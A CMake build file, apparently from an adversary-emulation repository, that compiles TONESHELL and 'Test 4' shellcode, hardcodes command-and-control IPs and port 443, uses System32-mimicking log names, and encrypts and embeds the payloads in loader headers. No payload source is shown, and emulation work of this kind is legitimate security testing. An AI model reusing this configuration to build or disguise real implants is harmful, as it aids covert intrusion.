ael/Enterprise/mustang_panda/Resources/toneshell/src/shellcode/CMakeLists.txt at main · attackevals/ael · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
###############################################################################
# TONESHELL AND TEST 4 SHELLCODE
###############################################################################

# Defines TONESHELL shellcode
add_pic(
    shellcode
    entry.cpp
    shellcode.hpp
    ""
    comms.cpp
    comms_encryption_det.cpp
    exec.cpp
    shellcode_util.cpp
    shellcode_util_id_d.cpp
    "${CMAKE_SOURCE_DIR}/src/common/logger.cpp"
    "${CMAKE_SOURCE_DIR}/src/common/pi_aes_ctr.cpp"
    "${CMAKE_SOURCE_DIR}/src/common/pi_base64.cpp"
    "${CMAKE_SOURCE_DIR}/src/common/util.cpp"
    "${CMAKE_SOURCE_DIR}/src/common/xor.cpp"
)

# Defines Test 4 shellcode
add_pic(
    test4shellcode
    entry.cpp
    test4shellcode.hpp
    ""
    comms.cpp
    comms_encryption_test4.cpp
    exec.cpp
    rc4.cpp
    shellcode_util.cpp
    shellcode_util_id_p.cpp
    "${CMAKE_SOURCE_DIR}/src/common/logger.cpp"
    "${CMAKE_SOURCE_DIR}/src/common/pi_aes_ctr.cpp"
    "${CMAKE_SOURCE_DIR}/src/common/pi_base64.cpp"
    "${CMAKE_SOURCE_DIR}/src/common/util.cpp"
    "${CMAKE_SOURCE_DIR}/src/common/xor.cpp"
)

target_include_directories(
    shellcode-pe
    PUBLIC
    "${CMAKE_SOURCE_DIR}/src/shellcode"
    "${CMAKE_SOURCE_DIR}/src/common"
)

target_include_directories(
    test4shellcode-pe
    PUBLIC
    "${CMAKE_SOURCE_DIR}/src/shellcode"
    "${CMAKE_SOURCE_DIR}/src/common"
)

target_compile_definitions(
    shellcode-pe
    PRIVATE
    SERVER="191.44.44.199"
    PORT=443
    SH_LOG_FILE="C:\\\\Windows\\\\System32\\\\wsdapi_dat.log"
    ENCRYPTED_LOGGING=1 # set to 0 to disable, set to non-0 to enable
)

target_compile_definitions(
    test4shellcode-pe
    PRIVATE
    SERVER="191.44.44.224"
    PORT=443
    SH_LOG_FILE="C:\\\\Windows\\\\System32\\\\gflagsui_dat.log"
    ENCRYPTED_LOGGING=1 # set to 0 to disable, set to non-0 to enable
)

# Encrypt and embed TONESHELL shellcode in header
add_custom_command(
    TARGET shellcode-pe
    PRE_BUILD
    COMMAND
        cmake -E remove "${CMAKE_SOURCE_DIR}/src/wsdapi/embedded.hpp"
    COMMENT "Clean previously generated embedded.hpp file"
)
add_custom_command(
    TARGET shellcode-pe
    POST_BUILD
    COMMAND
        powershell.exe -File "${CMAKE_SOURCE_DIR}/src/common/embed_payload.ps1" -Template "${CMAKE_SOURCE_DIR}/src/common/embedded.hpp.in" -InputFile "$<TARGET_FILE_DIR:shellcode-pe>/shellcode.bin" -OutputFile "${CMAKE_SOURCE_DIR}/src/wsdapi/embedded.hpp" -EmbedNamespace "embedded"
    COMMENT "Generating header with embedded shellcode and encryption key"
)

# Encrypt and embed test 4 shellcode in header
add_custom_command(
    TARGET test4shellcode-pe
    PRE_BUILD
    COMMAND
        cmake -E remove "${CMAKE_SOURCE_DIR}/src/test4/gflagsui/t4embedded.hpp"
    COMMENT "Clean previously generated t4embedded.hpp file"
)
add_custom_command(
    TARGET test4shellcode-pe
    POST_BUILD
    COMMAND
        powershell.exe -File "${CMAKE_SOURCE_DIR}/src/common/embed_payload.ps1" -Template "${CMAKE_SOURCE_DIR}/src/common/embedded.hpp.in" -InputFile "$<TARGET_FILE_DIR:test4shellcode-pe>/test4shellcode.bin" -OutputFile "${CMAKE_SOURCE_DIR}/src/test4/gflagsui/t4embedded.hpp" -EmbedNamespace "embedded"
    COMMENT "Generating header with embedded test 4 shellcode and encryption key"
)